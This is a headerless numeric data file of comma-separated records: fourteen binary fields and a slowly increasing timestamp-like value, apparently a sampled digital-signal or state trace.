1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2560380e-02 1,1,0,1,1,1,0,0,0,1,0,0,1,0,2.2560404e-02 1,1,0,1,1,1,0,0,0,1,0,0,0,0,2.2560432e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2560436e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2560484e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2560508e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2560532e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2560556e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2560580e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2560604e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2560632e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2560656e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2560684e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2560708e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2560732e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2560756e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2560780e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2560804e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2560832e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2560856e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2560884e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2560908e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2560932e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2560956e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2560980e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2561004e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2561032e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2561056e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2561084e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2561108e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2561132e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2561156e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2561180e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2561204e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2561232e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2561256e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2561284e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2561308e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2561332e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2561356e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2561380e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2561404e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2561432e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2561456e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2561484e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2561508e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2561532e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2561556e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2561580e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2561604e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2561632e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2561656e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2561684e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2561708e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2561732e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2561756e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2561780e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2561804e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2561832e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2561856e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2561884e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2561908e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2561932e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2561956e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2561980e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2562004e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2562032e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2562056e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2562084e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2562104e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2562128e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2562156e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2562180e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2562204e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2562228e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2562252e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2562276e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2562304e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2562328e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2562356e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2562380e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2562404e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2562428e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2562452e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2562476e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2562504e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2562528e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2562556e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2562580e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2562604e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2562628e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2562652e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2562676e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2562704e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2562728e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2562756e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2562780e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2562804e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2562828e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2562852e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2562884e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2562908e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2562932e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2562956e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2562980e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2563004e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2563032e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2563056e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2563084e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2563108e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2563132e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2563156e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2563180e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2563204e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2563232e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2563256e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2563284e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2563308e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2563332e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2563356e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2563380e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2563404e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2563432e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2563456e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2563484e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2563508e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2563532e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2563556e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2563580e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2563604e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2563632e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2563656e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2563684e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2563708e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2563732e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2563756e-02 1,1,0,1,1,0,0,0,0,0,0,0,1,0,2.2563780e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,0,2.2563804e-02 1,1,0,1,1,0,0,0,0,0,0,0,0,1,2.2688240e-02 0,0,0,1,1,0,0,0,0,0,0,0,0,1,2.2688436e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,2.2688456e-02 0,0,1,1,1,0,0,0,0,0,0,1,0,1,2.2688488e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,2.2688512e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,1,2.2688796e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,1,2.2688828e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,1,2.2688876e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,1,2.2688900e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,2.2688908e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,1,2.2688924e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,2.2688948e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,1,2.2689000e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,2.2689028e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,1,2.2689052e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2689072e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2689076e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2689080e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,2.2689128e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2689148e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2689160e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2689172e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2689196e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2689204e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,2.2689252e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2689276e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2689284e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2689300e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2689324e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2689348e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2689372e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2689400e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2689428e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2689448e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2689476e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,2.2689524e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2689548e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2689556e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2689572e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2689596e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2689604e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,2.2689652e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2689676e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,2.2689700e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2689724e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2689732e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2689748e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2689772e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2689796e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2689824e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2689852e-02 0,0,1,1,1,0,0,0,0,1,0,0,0,0,2.2689876e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2689880e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,2.2689924e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2689948e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2689956e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2689972e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2689996e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2690004e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,2.2690052e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2690076e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2690084e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2690100e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2690124e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2690148e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2690172e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2690196e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2690224e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2690228e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,2.2690248e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2690276e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,2.2690324e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2690348e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2690356e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2690372e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2690396e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2690424e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2690448e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2690476e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2690500e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2690504e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,2.2690524e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2690548e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,2.2690572e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2690596e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,2.2690624e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2690648e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2690656e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2690700e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2690724e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2690748e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2690772e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2690796e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2690824e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2690828e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,2.2690876e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2690900e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2690908e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2690924e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2690948e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2690972e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2690996e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2691024e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2691048e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2691052e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,2.2691076e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2691100e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2691108e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2691124e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2691148e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2691156e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,2.2691200e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2691224e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,2.2691252e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2691276e-02 0,0,1,1,1,1,0,0,0,0,0,0,0,0,2.2691280e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2691284e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2691300e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2691324e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2691348e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2691372e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2691396e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2691424e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2691428e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,2.2691476e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2691500e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2691508e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2691524e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2691548e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2691556e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,2.2691600e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2691624e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2691632e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2691652e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2691676e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2691700e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2691724e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2691748e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2691772e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2691780e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,2.2691824e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2691852e-02 0,0,1,1,1,1,0,0,0,0,0,0,0,0,2.2691856e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2691860e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2691876e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2691900e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2691924e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2691948e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2691972e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2691996e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2692004e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,2.2692052e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2692076e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2692084e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2692100e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2692124e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2692148e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2692172e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2692200e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2692224e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2692228e-02 0,0,1,1,1,1,0,0,0,1,0,0,1,0,2.2692244e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,2.2692272e-02 0,0,1,1,1,1,0,0,0,0,0,0,0,0,2.2692276e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2692280e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2692296e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2692324e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2692348e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2692372e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2692396e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2692420e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2692444e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2692472e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2692496e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2692524e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2692548e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2692572e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2692596e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2692620e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2692644e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2692672e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2692696e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2692724e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2692748e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2692772e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2692796e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2692820e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2692844e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2692872e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2692896e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2692924e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2692948e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2692972e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2692996e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2693020e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2693044e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2693072e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2693096e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2693124e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2693148e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2693172e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2693196e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2693220e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2693244e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2693272e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2693296e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2693324e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2693348e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2693372e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2693396e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2693420e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2693444e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2693472e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2693496e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2693524e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2693548e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2693572e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2693596e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2693620e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2693644e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2693672e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2693696e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2693724e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2693748e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2693772e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2693796e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2693820e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2693844e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2693872e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2693896e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2693924e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2693948e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2693972e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2693996e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2694020e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2694044e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2694072e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2694096e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2694124e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2694148e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2694172e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2694196e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2694220e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2694244e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2694272e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2694296e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2694324e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2694348e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2694372e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2694396e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2694420e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2694444e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2694472e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2694496e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2694524e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2694548e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2694572e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2694596e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2694620e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2694644e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2694672e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2694696e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2694724e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2694748e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2694772e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,2.2694796e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,2.2694820e-02 